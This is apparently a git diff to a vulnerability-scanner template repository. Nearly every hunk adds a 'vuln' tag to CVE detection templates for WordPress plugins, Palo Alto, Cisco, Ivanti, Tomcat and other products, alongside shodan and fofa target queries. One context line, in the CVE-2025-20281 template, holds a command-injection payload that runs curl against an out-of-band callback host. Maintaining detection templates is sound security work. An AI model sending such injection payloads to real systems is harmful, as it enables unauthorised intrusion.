cve,cve2024,wp,wordpress,wp-plugin,wp-file-upload,lfi,vkev + tags: cve,cve2024,wp,wordpress,wp-plugin,wp-file-upload,lfi,vkev,vuln variables: file: "{{rand_base(16)}}" diff --git a/http/cves/2024/CVE-2024-9061.yaml b/http/cves/2024/CVE-2024-9061.yaml index 48891c724ab..54e5aa393f4 100644 --- a/http/cves/2024/CVE-2024-9061.yaml +++ b/http/cves/2024/CVE-2024-9061.yaml @@ -24,7 +24,7 @@ info: product: wp-popup-builder framework: wordpress fofa-query: body="/wp-content/plugins/wp-popup-builder/" - tags: cve,cve2024,wp,wordpress,wp-plugin,wp-popup-builder,shortcode + tags: cve,cve2024,wp,wordpress,wp-plugin,wp-popup-builder,shortcode,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-9166.yaml b/http/cves/2024/CVE-2024-9166.yaml index 60e8354ab05..d0065a9f668 100644 --- a/http/cves/2024/CVE-2024-9166.yaml +++ b/http/cves/2024/CVE-2024-9166.yaml @@ -20,7 +20,7 @@ info: verified: true max-request: 1 fofa-query: title="TitanNit Web Control" - tags: cve,cve2024,titanit,web-control,oast,rce,ics + tags: cve,cve2024,titanit,web-control,oast,rce,ics,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-9186.yaml b/http/cves/2024/CVE-2024-9186.yaml index 481e61e2152..aa587e67355 100644 --- a/http/cves/2024/CVE-2024-9186.yaml +++ b/http/cves/2024/CVE-2024-9186.yaml @@ -24,7 +24,7 @@ info: product: wp-marketing-automations framework: wordpress fofa-query: body="wp-content/plugins/wp-marketing-automations/" - tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,wp-marketing-automations,time-based-sqli + tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,wp-marketing-automations,time-based-sqli,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-9193.yaml b/http/cves/2024/CVE-2024-9193.yaml index f01cc1d4f95..4c56427974d 100644 --- a/http/cves/2024/CVE-2024-9193.yaml +++ b/http/cves/2024/CVE-2024-9193.yaml @@ -20,7 +20,7 @@ info: metadata: verified: true max-request: 2 - tags: cve,cve2024,whmpress,whmcs,wordpress,wp,intrusive,vkev + tags: cve,cve2024,whmpress,whmcs,wordpress,wp,intrusive,vkev,vuln variables: randomstr: "{{randstr_1}}" diff --git a/http/cves/2024/CVE-2024-9234.yaml b/http/cves/2024/CVE-2024-9234.yaml index 82881241644..4824882c54e 100644 --- a/http/cves/2024/CVE-2024-9234.yaml +++ b/http/cves/2024/CVE-2024-9234.yaml @@ -23,7 +23,7 @@ info: product: gutenkit framework: wordpress fofa-query: body="wp-content/plugins/gutenkit-blocks-addon" - tags: cve,cve2024,wordpress,wp-plugin,gutenkit,file-upload,intrusive,vkev + tags: cve,cve2024,wordpress,wp-plugin,gutenkit,file-upload,intrusive,vkev,vuln variables: filename: "{{rand_text_alpha(12)}}" diff --git a/http/cves/2024/CVE-2024-9264.yaml b/http/cves/2024/CVE-2024-9264.yaml index 408fbd05beb..b5954ceaaf9 100644 --- a/http/cves/2024/CVE-2024-9264.yaml +++ b/http/cves/2024/CVE-2024-9264.yaml @@ -30,7 +30,7 @@ info: - app="grafana" - title="grafana" google-query: intitle:"grafana" - tags: cve,cve2024,grafana,sqli,lfr,authenticated + tags: cve,cve2024,grafana,sqli,lfr,authenticated,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-9463.yaml b/http/cves/2024/CVE-2024-9463.yaml index f0ee6447002..280b7bb2461 100644 --- a/http/cves/2024/CVE-2024-9463.yaml +++ b/http/cves/2024/CVE-2024-9463.yaml @@ -28,7 +28,7 @@ info: vendor: paloaltonetworks product: expedition shodan-query: http.favicon.hash:1499876150 - tags: cve,cve2024,palo-alto,rce,kev,vkev + tags: cve,cve2024,palo-alto,rce,kev,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-9465.yaml b/http/cves/2024/CVE-2024-9465.yaml index fa625db9a5a..e608474ca58 100644 --- a/http/cves/2024/CVE-2024-9465.yaml +++ b/http/cves/2024/CVE-2024-9465.yaml @@ -24,7 +24,7 @@ info: vendor: paloaltonetworks product: expedition shodan-query: http.favicon.hash:1499876150 - tags: time-based-sqli,cve,cve2024,palo-alto,sqli,kev,vkev + tags: time-based-sqli,cve,cve2024,palo-alto,sqli,kev,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-9474.yaml b/http/cves/2024/CVE-2024-9474.yaml index 015dbac6bc5..cf690569127 100644 --- a/http/cves/2024/CVE-2024-9474.yaml +++ b/http/cves/2024/CVE-2024-9474.yaml @@ -24,7 +24,7 @@ info: - cpe:"cpe:2.3:o:paloaltonetworks:pan-os" - http.favicon.hash:"-631559155" fofa-query: icon_hash="-631559155" - tags: cve,cve2024,panos,rce,kev,vkev + tags: cve,cve2024,panos,rce,kev,vkev,vuln flow: http(1) && http(2) && http(3) diff --git a/http/cves/2024/CVE-2024-9593.yaml b/http/cves/2024/CVE-2024-9593.yaml index 8c06dda725e..cafe4bd777b 100644 --- a/http/cves/2024/CVE-2024-9593.yaml +++ b/http/cves/2024/CVE-2024-9593.yaml @@ -24,7 +24,7 @@ info: product: time-clock & time-clock-pro framework: wordpress fofa-query: body="/wp-content/plugins/time-clock/" || body="/wp-content/plugins/time-clock-pro/" - tags: cve,cve2024,time-clock,wp,wordpress,wp-plugin,rce,time-clock-pro,vkev + tags: cve,cve2024,time-clock,wp,wordpress,wp-plugin,rce,time-clock-pro,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-9617.yaml b/http/cves/2024/CVE-2024-9617.yaml index 9b74087ac20..4f46443c10a 100644 --- a/http/cves/2024/CVE-2024-9617.yaml +++ b/http/cves/2024/CVE-2024-9617.yaml @@ -22,7 +22,7 @@ info: vendor: danswer-ai product: danswer fofa-query: icon_hash="484766002" - tags: cve,cve2024,danswer,idor + tags: cve,cve2024,danswer,idor,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-9707.yaml b/http/cves/2024/CVE-2024-9707.yaml index 41b7447cffa..a6e63d47b63 100644 --- a/http/cves/2024/CVE-2024-9707.yaml +++ b/http/cves/2024/CVE-2024-9707.yaml @@ -27,7 +27,7 @@ info: product: hunk_companion framework: wordpress fofa-query: body="/wp-content/plugins/hunk-companion/" - tags: cve,cve2024,wp,wp-plugin,wordpress,hunk-companion,intrusive,vkev + tags: cve,cve2024,wp,wp-plugin,wordpress,hunk-companion,intrusive,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-9772.yaml b/http/cves/2024/CVE-2024-9772.yaml index 6e7cbc169ff..108486b9b48 100644 --- a/http/cves/2024/CVE-2024-9772.yaml +++ b/http/cves/2024/CVE-2024-9772.yaml @@ -29,7 +29,7 @@ info: product: uix_shortcodes framework: wordpress publicwww-query: "/wp-content/plugins/uix-shortcodes/" - tags: cve,cve2024,wordpress,wp-plugin,wp,wpscan,shortcode,uix-shortcodes + tags: cve,cve2024,wordpress,wp-plugin,wp,wpscan,shortcode,uix-shortcodes,vuln variables: string: "{{to_lower('{{randstr}}')}}" diff --git a/http/cves/2024/CVE-2024-9796.yaml b/http/cves/2024/CVE-2024-9796.yaml index 525448e5f7e..45ad19c2e92 100644 --- a/http/cves/2024/CVE-2024-9796.yaml +++ b/http/cves/2024/CVE-2024-9796.yaml @@ -24,7 +24,7 @@ info: product: wp-advanced-search framework: wordpress fofa-query: body="/wp-content/plugins/wp-advanced-search/" - tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,wp-advanced-search + tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,wp-advanced-search,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-9916.yaml b/http/cves/2024/CVE-2024-9916.yaml index 7ca64b7dc61..b407ae6c2a0 100644 --- a/http/cves/2024/CVE-2024-9916.yaml +++ b/http/cves/2024/CVE-2024-9916.yaml @@ -23,7 +23,7 @@ info: verified: true max-request: 1 fofa-query: body="usualtool" - tags: cve,cve2024,huangdou,utc,rce,php,vkev + tags: cve,cve2024,huangdou,utc,rce,php,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-9935.yaml b/http/cves/2024/CVE-2024-9935.yaml index fc8ab4aae31..8a6205acafd 100644 --- a/http/cves/2024/CVE-2024-9935.yaml +++ b/http/cves/2024/CVE-2024-9935.yaml @@ -25,7 +25,7 @@ info: product: pdf-generator-addon-for-elementor-page-builder framework: wordpress fofa-query: body="wp-content/plugins/pdf-generator-addon-for-elementor-page-builder/" - tags: cve,cve2024,wp,wordpress,wp-plugin,lfi,pdf-generator + tags: cve,cve2024,wp,wordpress,wp-plugin,lfi,pdf-generator,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-9989.yaml b/http/cves/2024/CVE-2024-9989.yaml index 16148963b15..f73bf3555c4 100644 --- a/http/cves/2024/CVE-2024-9989.yaml +++ b/http/cves/2024/CVE-2024-9989.yaml @@ -28,7 +28,7 @@ info: framework: wordpress shodan-query: http.html:"wp-content/plugins/crypto" fofa-query: body="wp-content/plugins/crypto" - tags: cve,cve2024,wordpress,wp,wp-plugin,crypto,auth-bypass + tags: cve,cve2024,wordpress,wp,wp-plugin,crypto,auth-bypass,vuln flow: http(1) && http(2) diff --git a/http/cves/2025/CVE-2025-0107.yaml b/http/cves/2025/CVE-2025-0107.yaml index a887d985a49..3f4af836297 100644 --- a/http/cves/2025/CVE-2025-0107.yaml +++ b/http/cves/2025/CVE-2025-0107.yaml @@ -20,7 +20,7 @@ info: max-request: 1 shodan-query: title:"Expedition" fofa-query: title=="Expedition Project" - tags: cve,cve2025,rce,paloalto,expedition,vkev + tags: cve,cve2025,rce,paloalto,expedition,vkev,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-0108.yaml b/http/cves/2025/CVE-2025-0108.yaml index cd28e7ae4ac..0ee1396a7f3 100644 --- a/http/cves/2025/CVE-2025-0108.yaml +++ b/http/cves/2025/CVE-2025-0108.yaml @@ -24,7 +24,7 @@ info: shodan-query: - cpe:"cpe:2.3:o:paloaltonetworks:pan-os" - http.favicon.hash:"-631559155" - tags: cve,cve2025,panos,auth-bypass,kev,vkev + tags: cve,cve2025,panos,auth-bypass,kev,vkev,vuln http: - method: GET diff --git a/http/cves/2025/CVE-2025-0133.yaml b/http/cves/2025/CVE-2025-0133.yaml index 64465f0407d..336e58e2819 100644 --- a/http/cves/2025/CVE-2025-0133.yaml +++ b/http/cves/2025/CVE-2025-0133.yaml @@ -21,7 +21,7 @@ info: fofa-query: icon_hash="-631559155" product: pan-os vendor: paloaltonetworks - tags: hackerone,cve,cve2025,xss,panos,global-protect + tags: hackerone,cve,cve2025,xss,panos,global-protect,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-0282.yaml b/http/cves/2025/CVE-2025-0282.yaml index 1afaf1c8fc4..ee8b98e3754 100644 --- a/http/cves/2025/CVE-2025-0282.yaml +++ b/http/cves/2025/CVE-2025-0282.yaml @@ -24,7 +24,7 @@ info: vendor: ivanti product: connect_secure shodan-query: http.title:"ivanti connect secure" - tags: cve,cve2025,ivanti,rce,buffer-overflow,passive,kev,vkev + tags: cve,cve2025,ivanti,rce,buffer-overflow,passive,kev,vkev,vuln http: - method: GET diff --git a/http/cves/2025/CVE-2025-0674.yaml b/http/cves/2025/CVE-2025-0674.yaml index 79e25543b20..f0dfb11632c 100644 --- a/http/cves/2025/CVE-2025-0674.yaml +++ b/http/cves/2025/CVE-2025-0674.yaml @@ -23,7 +23,7 @@ info: verified: true max-request: 1 fofa-query: title="Elber Satellite Equipment" || body="www.elber.it" - tags: cve,cve2025,auth-bypass,elber,vkev + tags: cve,cve2025,auth-bypass,elber,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2025/CVE-2025-0868.yaml b/http/cves/2025/CVE-2025-0868.yaml index 36f3495da85..f4189e23aec 100644 --- a/http/cves/2025/CVE-2025-0868.yaml +++ b/http/cves/2025/CVE-2025-0868.yaml @@ -17,7 +17,7 @@ info: verified: true max-request: 1 fofa-query: body="Welcome to DocsGPT" - tags: cve,cve2025,docsgpt,unauth,rce,vkev + tags: cve,cve2025,docsgpt,unauth,rce,vkev,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-10035.yaml b/http/cves/2025/CVE-2025-10035.yaml index 2a063b02b44..8b2c906f362 100644 --- a/http/cves/2025/CVE-2025-10035.yaml +++ b/http/cves/2025/CVE-2025-10035.yaml @@ -19,7 +19,7 @@ info: max-request: 1 shodan-query: title:"GoAnywhere" fofa-query: title="GoAnywhere" - tags: cve,cve2025,goanywhere,auth-bypass,vkev,kev + tags: cve,cve2025,goanywhere,auth-bypass,vkev,kev,vuln variables: string: "{{to_lower(rand_text_alpha(5))}}" diff --git a/http/cves/2025/CVE-2025-1025.yaml b/http/cves/2025/CVE-2025-1025.yaml index cd91c7329b5..1666d935cf8 100644 --- a/http/cves/2025/CVE-2025-1025.yaml +++ b/http/cves/2025/CVE-2025-1025.yaml @@ -20,7 +20,7 @@ info: max-request: 4 verified: true shodan-query: title:"Cockpit" - tags: cve,cve2025,cockpit,file-upload,rce,intrusive + tags: cve,cve2025,cockpit,file-upload,rce,intrusive,vuln flow: http(1) && http(2) && http(3) diff --git a/http/cves/2025/CVE-2025-1035.yaml b/http/cves/2025/CVE-2025-1035.yaml index a577b226b7d..17ac77d6bdf 100644 --- a/http/cves/2025/CVE-2025-1035.yaml +++ b/http/cves/2025/CVE-2025-1035.yaml @@ -22,7 +22,7 @@ info: max-request: 2 vendor: klogserver product: klog_server - tags: cve,cve2025,klog-server,lfi + tags: cve,cve2025,klog-server,lfi,vuln variables: filename: "{{to_lower(rand_text_alpha(6))}}" diff --git a/http/cves/2025/CVE-2025-1097.yaml b/http/cves/2025/CVE-2025-1097.yaml index 8603e99f368..fe560499160 100644 --- a/http/cves/2025/CVE-2025-1097.yaml +++ b/http/cves/2025/CVE-2025-1097.yaml @@ -21,7 +21,7 @@ info: verified: true max-request: 1 shodan-query: ssl:"ingress-nginx" port:8443 - tags: cve,cve2025,cloud,devops,kubernetes,ingress,nginx,k8s + tags: cve,cve2025,cloud,devops,kubernetes,ingress,nginx,k8s,vuln variables: string: "{{to_lower('{{randstr}}')}}" diff --git a/http/cves/2025/CVE-2025-1098.yaml b/http/cves/2025/CVE-2025-1098.yaml index b48bf268078..49c5900de7d 100644 --- a/http/cves/2025/CVE-2025-1098.yaml +++ b/http/cves/2025/CVE-2025-1098.yaml @@ -21,7 +21,7 @@ info: verified: true max-request: 1 shodan-query: ssl:"ingress-nginx" port:8443 - tags: cve,cve2025,cloud,devops,kubernetes,ingress,nginx,k8s,rce + tags: cve,cve2025,cloud,devops,kubernetes,ingress,nginx,k8s,rce,vuln variables: string: "{{to_lower('{{randstr}}')}}" diff --git a/http/cves/2025/CVE-2025-11371.yaml b/http/cves/2025/CVE-2025-11371.yaml index 776c2b4b5f5..2c78cdc5ba2 100644 --- a/http/cves/2025/CVE-2025-11371.yaml +++ b/http/cves/2025/CVE-2025-11371.yaml @@ -27,7 +27,7 @@ info: max-request: 1 shodan-query: title:"CentreStack" fofa-query: "CentreStack - Login" - tags: cve,cve2025,gladinet,lfi,centrestack,vkev + tags: cve,cve2025,gladinet,lfi,centrestack,vkev,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-11750.yaml b/http/cves/2025/CVE-2025-11750.yaml index a70db8bf151..a924221fd2b 100644 --- a/http/cves/2025/CVE-2025-11750.yaml +++ b/http/cves/2025/CVE-2025-11750.yaml @@ -17,7 +17,7 @@ info: product: dify shodan-query: http.favicon.hash:"97378986" fofa-query: icon_hash="97378986" - tags: cve,cve2025,langgenius,dify,user-enum + tags: cve,cve2025,langgenius,dify,user-enum,vuln variables: fake_email: "{{to_lower(rand_text_alphanumeric(16))}}@{{to_lower(rand_text_alphanumeric(16))}}.com" diff --git a/http/cves/2025/CVE-2025-1323.yaml b/http/cves/2025/CVE-2025-1323.yaml index 5e62ccb4a93..af8e9682e30 100644 --- a/http/cves/2025/CVE-2025-1323.yaml +++ b/http/cves/2025/CVE-2025-1323.yaml @@ -25,7 +25,7 @@ info: shodan-query: http.html:"/wp-content/plugins/wp-recall/" fofa-query: body=/wp-content/plugins/wp-recall/ publicwww-query: /wp-content/plugins/wp-recall/ - tags: cve,cve2025,wp-recall,wordpress,wp-plugin,sqli,wp + tags: cve,cve2025,wp-recall,wordpress,wp-plugin,sqli,wp,vuln variables: marker: "{{randstr}}" diff --git a/http/cves/2025/CVE-2025-1562.yaml b/http/cves/2025/CVE-2025-1562.yaml index 8a9ea353e3b..8cbf3c35960 100644 --- a/http/cves/2025/CVE-2025-1562.yaml +++ b/http/cves/2025/CVE-2025-1562.yaml @@ -23,7 +23,7 @@ info: verified: true max-request: 3 publicwww-query: "/wp-content/plugins/wp-marketing-automations/" - tags: cve,cve2025,wordpress,wp-plugin,wp,wp-marketing-automations,wordpress,authenticated,vkev + tags: cve,cve2025,wordpress,wp-plugin,wp,wp-marketing-automations,wordpress,authenticated,vkev,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-1595.yaml b/http/cves/2025/CVE-2025-1595.yaml index 61a0a27cfde..8a6bf980abb 100644 --- a/http/cves/2025/CVE-2025-1595.yaml +++ b/http/cves/2025/CVE-2025-1595.yaml @@ -21,7 +21,7 @@ info: fofa-query: title="EasyCVR" shodan-query: http.title:"EasyCVR" product: easycvr - tags: cve,cve2025,exposure,easycvr + tags: cve,cve2025,exposure,easycvr,vuln http: - method: GET diff --git a/http/cves/2025/CVE-2025-1661.yaml b/http/cves/2025/CVE-2025-1661.yaml index d46dd2d152a..2472de70118 100644 --- a/http/cves/2025/CVE-2025-1661.yaml +++ b/http/cves/2025/CVE-2025-1661.yaml @@ -24,7 +24,7 @@ info: verified: true max-request: 2 publicwww-query: "/wp-content/plugins/woocommerce-products-filter/" - tags: cve,cve2025,woocommerce-products-filter,wordpress,wp-plugin,wp,woocommerce,vkev + tags: cve,cve2025,woocommerce-products-filter,wordpress,wp-plugin,wp,woocommerce,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2025/CVE-2025-1743.yaml b/http/cves/2025/CVE-2025-1743.yaml index c68a9c3b1b7..23ac948953b 100644 --- a/http/cves/2025/CVE-2025-1743.yaml +++ b/http/cves/2025/CVE-2025-1743.yaml @@ -24,7 +24,7 @@ info: fofa-query: title="PicHome" vendor: zyx0814 product: Pichome - tags: cve,cve2025,lfi,pichome,zyx0814 + tags: cve,cve2025,lfi,pichome,zyx0814,vuln http: - method: GET diff --git a/http/cves/2025/CVE-2025-1974.yaml b/http/cves/2025/CVE-2025-1974.yaml index 5f19d1957bb..50decd34730 100644 --- a/http/cves/2025/CVE-2025-1974.yaml +++ b/http/cves/2025/CVE-2025-1974.yaml @@ -27,7 +27,7 @@ info: verified: true max-request: 1 shodan-query: ssl:"ingress-nginx" port:8443 - tags: cve,cve2025,cloud,devops,kubernetes,ingress,nginx,k8s + tags: cve,cve2025,cloud,devops,kubernetes,ingress,nginx,k8s,vuln variables: string: "{{to_lower('{{randstr}}')}}" diff --git a/http/cves/2025/CVE-2025-2010.yaml b/http/cves/2025/CVE-2025-2010.yaml index b662ff0f57c..2730ed70833 100644 --- a/http/cves/2025/CVE-2025-2010.yaml +++ b/http/cves/2025/CVE-2025-2010.yaml @@ -25,7 +25,7 @@ info: max-request: 1 product: jobwp fofa-query: body="/wp-content/plugins/jobwp" - tags: cve,cve2025,wp,wordpress,wp-plugin,sqli,jobwp + tags: cve,cve2025,wp,wordpress,wp-plugin,sqli,jobwp,vuln flow: http(1) && http(2) diff --git a/http/cves/2025/CVE-2025-2011.yaml b/http/cves/2025/CVE-2025-2011.yaml index 9246000effd..5a634e5d37a 100644 --- a/http/cves/2025/CVE-2025-2011.yaml +++ b/http/cves/2025/CVE-2025-2011.yaml @@ -23,7 +23,7 @@ info: verified: true max-request: 1 publicwww-query: "/wp-content/plugins/depicter/" - tags: cve,cve2025,wordpress,wp-plugin,wp,sqli,vkev + tags: cve,cve2025,wordpress,wp-plugin,wp,sqli,vkev,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-20188.yaml b/http/cves/2025/CVE-2025-20188.yaml index 7e72227004e..7f663be903c 100644 --- a/http/cves/2025/CVE-2025-20188.yaml +++ b/http/cves/2025/CVE-2025-20188.yaml @@ -21,7 +21,7 @@ info: max-request: 2 fofa-query: '"IOS-Self-Signed-Certificate" && port="8443"' shodan-query: 'http.html_hash:1076109428 ssl.cert.issuer.cn:"IOS-Self-Signed-Certificate" port:8443' - tags: cve,cve2025,cisco,file-upload,intrusive,rce,vkev + tags: cve,cve2025,cisco,file-upload,intrusive,rce,vkev,vuln flow: | if (http(1)) { diff --git a/http/cves/2025/CVE-2025-20281.yaml b/http/cves/2025/CVE-2025-20281.yaml index e6b1616d167..ee492fdb8fe 100644 --- a/http/cves/2025/CVE-2025-20281.yaml +++ b/http/cves/2025/CVE-2025-20281.yaml @@ -30,7 +30,7 @@ info: shodan-query: '"Set-Cookie: APPSESSIONID=" "Path=/admin"' fofa-query: title="identity services engine" google-query: intitle:"identity services engine" - tags: cve,cve2025,cisco,cisco-ise,rce,kev,vkev,oast,oob + tags: cve,cve2025,cisco,cisco-ise,rce,kev,vkev,oast,oob,vuln variables: cmd: 'x;curl${IFS}http://{{interactsh-url}}' diff --git a/http/cves/2025/CVE-2025-20362.yaml b/http/cves/2025/CVE-2025-20362.yaml index 10b9c04f76d..b6a442dadc1 100644 --- a/http/cves/2025/CVE-2025-20362.yaml +++ b/http/cves/2025/CVE-2025-20362.yaml @@ -27,7 +27,7 @@ info: vendor: cisco product: adaptive-security-appliance-software shodan-query: html:"/+CSCOE+/logon.html" - tags: cve,cve2025,cisco,asa,auth-bypass,kev,vkev + tags: cve,cve2025,cisco,asa,auth-bypass,kev,vkev,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-2075.yaml b/http/cves/2025/CVE-2025-2075.yaml index 8574cc8390e..bad716f3e2b 100644 --- a/http/cves/2025/CVE-2025-2075.yaml +++ b/http/cves/2025/CVE-2025-2075.yaml @@ -25,7 +25,7 @@ info: max-request: 4 publicwww-query: "/wp-content/plugins/uncanny-automator/" fofa-query: body="/wp-content/plugins/uncanny-automator/" - tags: cve,cve2025,wordpress,wp-plugin,authenticated,wp,uncanny-automator + tags: cve,cve2025,wordpress,wp-plugin,authenticated,wp,uncanny-automator,vuln variables: username: "{{username}}" diff --git a/http/cves/2025/CVE-2025-2127.yaml b/http/cves/2025/CVE-2025-2127.yaml index 08e7579b8b8..e778a43bc69 100644 --- a/http/cves/2025/CVE-2025-2127.yaml +++ b/http/cves/2025/CVE-2025-2127.yaml @@ -25,7 +25,7 @@ info: fofa-query: body="joomlaux" verified: true max-request: 2 - tags: cve,cve2025,joomlaux,joomla + tags: cve,cve2025,joomlaux,joomla,vuln http: - method: GET diff --git a/http/cves/2025/CVE-2025-2129.yaml b/http/cves/2025/CVE-2025-2129.yaml index 8087bba059c..f10804b3d39 100644 --- a/http/cves/2025/CVE-2025-2129.yaml +++ b/http/cves/2025/CVE-2025-2129.yaml @@ -23,7 +23,7 @@ info: verified: true max-request: 1 shodan-query: html:"Mage" - tags: cve,cve2025,mage + tags: cve,cve2025,mage,vuln http: - method: GET diff --git a/http/cves/2025/CVE-2025-2264.yaml b/http/cves/2025/CVE-2025-2264.yaml index ac40039804c..9fa06e0f6aa 100644 --- a/http/cves/2025/CVE-2025-2264.yaml +++ b/http/cves/2025/CVE-2025-2264.yaml @@ -22,7 +22,7 @@ info: vendor: santesoft product: sante_pacs_server shodan-query: http.favicon.hash:1185161484 - tags: cve,cve2024,sante,pacs,lfi,vkev + tags: cve,cve2024,sante,pacs,lfi,vkev,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-2294.yaml b/http/cves/2025/CVE-2025-2294.yaml index 7cd380f1f29..e07fadfcfcc 100644 --- a/http/cves/2025/CVE-2025-2294.yaml +++ b/http/cves/2025/CVE-2025-2294.yaml @@ -22,7 +22,7 @@ info: verified: true max-request: 2 fofa-query: body="wp-content/plugins/kubio/" - tags: cve,cve2025,wp,wordpress,wp-plugin,lfi,kubio,vkev + tags: cve,cve2025,wp,wordpress,wp-plugin,lfi,kubio,vkev,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-22952.yaml b/http/cves/2025/CVE-2025-22952.yaml index 3108b48bb31..6565224933f 100644 --- a/http/cves/2025/CVE-2025-22952.yaml +++ b/http/cves/2025/CVE-2025-22952.yaml @@ -23,7 +23,7 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:-1924700661 - tags: cve,cve2025,elestio,memos,ssrf,oast + tags: cve,cve2025,elestio,memos,ssrf,oast,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-23061.yaml b/http/cves/2025/CVE-2025-23061.yaml index f29a2a08b9f..aac8d3127ca 100644 --- a/http/cves/2025/CVE-2025-23061.yaml +++ b/http/cves/2025/CVE-2025-23061.yaml @@ -24,7 +24,7 @@ info: max-request: 1 shodan-query: title:"Mongoose" fofa-query: title="Mongoose" - tags: cve,cve2025,nosql,mongoose,nodejs + tags: cve,cve2025,nosql,mongoose,nodejs,vuln http: - method: GET diff --git a/http/cves/2025/CVE-2025-24016.yaml b/http/cves/2025/CVE-2025-24016.yaml index 31ca9e68760..495f626a16d 100644 --- a/http/cves/2025/CVE-2025-24016.yaml +++ b/http/cves/2025/CVE-2025-24016.yaml @@ -28,7 +28,7 @@ info: product: wazuh shodan-query: title:"Wazuh" fofa-query: app="Wazuh" - tags: cve,cve2025,wazuh,deserialization,rce,authenticated,kev,vkev + tags: cve,cve2025,wazuh,deserialization,rce,authenticated,kev,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2025/CVE-2025-24514.yaml b/http/cves/2025/CVE-2025-24514.yaml index e8a2638bb68..dd819e0a591 100644 --- a/http/cves/2025/CVE-2025-24514.yaml +++ b/http/cves/2025/CVE-2025-24514.yaml @@ -21,7 +21,7 @@ info: verified: true max-request: 1 shodan-query: ssl:"ingress-nginx" port:8443 - tags: cve,cve2025,cloud,devops,kubernetes,ingress,nginx,k8s + tags: cve,cve2025,cloud,devops,kubernetes,ingress,nginx,k8s,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-2473.yaml b/http/cves/2025/CVE-2025-2473.yaml index c3a50a7e656..941a58f31a6 100644 --- a/http/cves/2025/CVE-2025-2473.yaml +++ b/http/cves/2025/CVE-2025-2473.yaml @@ -20,7 +20,7 @@ info: metadata: verified: true max-request: 1 - tags: cve,cve2025,cvms,sqli,auth-bypass,cms,edb,packetstorm + tags: cve,cve2025,cvms,sqli,auth-bypass,cms,edb,packetstorm,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-24799.yaml b/http/cves/2025/CVE-2025-24799.yaml index dbc9ca5da3d..62a28ef2f30 100644 --- a/http/cves/2025/CVE-2025-24799.yaml +++ b/http/cves/2025/CVE-2025-24799.yaml @@ -25,7 +25,7 @@ info: max-request: 1 shodan-query: title:"GLPI" fofa-query: title="GLPI" - tags: cve,cve2025,glpi,sqli,vkev + tags: cve,cve2025,glpi,sqli,vkev,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-24813.yaml b/http/cves/2025/CVE-2025-24813.yaml index 8e509874e8d..05cdb75cccd 100644 --- a/http/cves/2025/CVE-2025-24813.yaml +++ b/http/cves/2025/CVE-2025-24813.yaml @@ -42,7 +42,7 @@ info: google-query: - intitle:"apache tomcat" - site:*/examples/jsp/snp/snoop.jsp - tags: cve,cve2025,apache,tomcat,rce,intrusive,kev,vkev + tags: cve,cve2025,apache,tomcat,rce,intrusive,kev,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2025/CVE-2025-24893.yaml b/http/cves/2025/CVE-2025-24893.yaml index 6522996af84..cccdbce8c52 100644 --- a/http/cves/2025/CVE-2025-24893.yaml +++ b/http/cves/2025/CVE-2025-24893.yaml @@ -28,7 +28,7 @@ info: product: xwiki shodan-query: html:"data-xwiki-reference" fofa-query: body="data-xwiki-reference" - tags: cve,cve2025,xwiki,rce,vkev + tags: cve,cve2025,xwiki,rce,vkev,vuln http: - method: GET diff --git a/http/cves/2025/CVE-2025-24963.yaml b/http/cves/2025/CVE-2025-24963.yaml index c634166d018..fdcee4ab606 100644 --- a/http/cves/2025/CVE-2025-24963.yaml +++ b/http/cves/2025/CVE-2025-24963.yaml @@ -23,7 +23,7 @@ info: metadata: verified: true max-request: 1 - tags: cve,cve2025,vitest,browser,mode,lfi + tags: cve,cve2025,vitest,browser,mode,lfi,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-25034.yaml b/http/cves/2025/CVE-2025-25034.yaml index 1e80e0296d1..dc64ca85fa9 100644 --- a/http/cves/2025/CVE-2025-25034.yaml +++ b/http/cves/2025/CVE-2025-25034.yaml @@ -27,7 +27,7 @@ info: verified: true fofa-query: app="sugarcrm" max-request: 2 - tags: cve,cve2025,sugarcrm,rce,php,deserialization,unauth,vkev + tags: cve,cve2025,sugarcrm,rce,php,deserialization,unauth,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2025/CVE-2025-25037.yaml b/http/cves/2025/CVE-2025-25037.yaml index d1d48e0856d..44c4d4e1bd1 100644 --- a/http/cves/2025/CVE-2025-25037.yaml +++ b/http/cves/2025/CVE-2025-25037.yaml @@ -23,7 +23,7 @@ info: vendor: aquatronica product: controller shodan-query: html:"aquatronica" - tags: cve,cve2025,aquatronica,info-leak,vkev + tags: cve,cve2025,aquatronica,info-leak,vkev,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-25231.yaml b/http/cves/2025/CVE-2025-25231.yaml index e8fe033f830..4587242252d 100644 --- 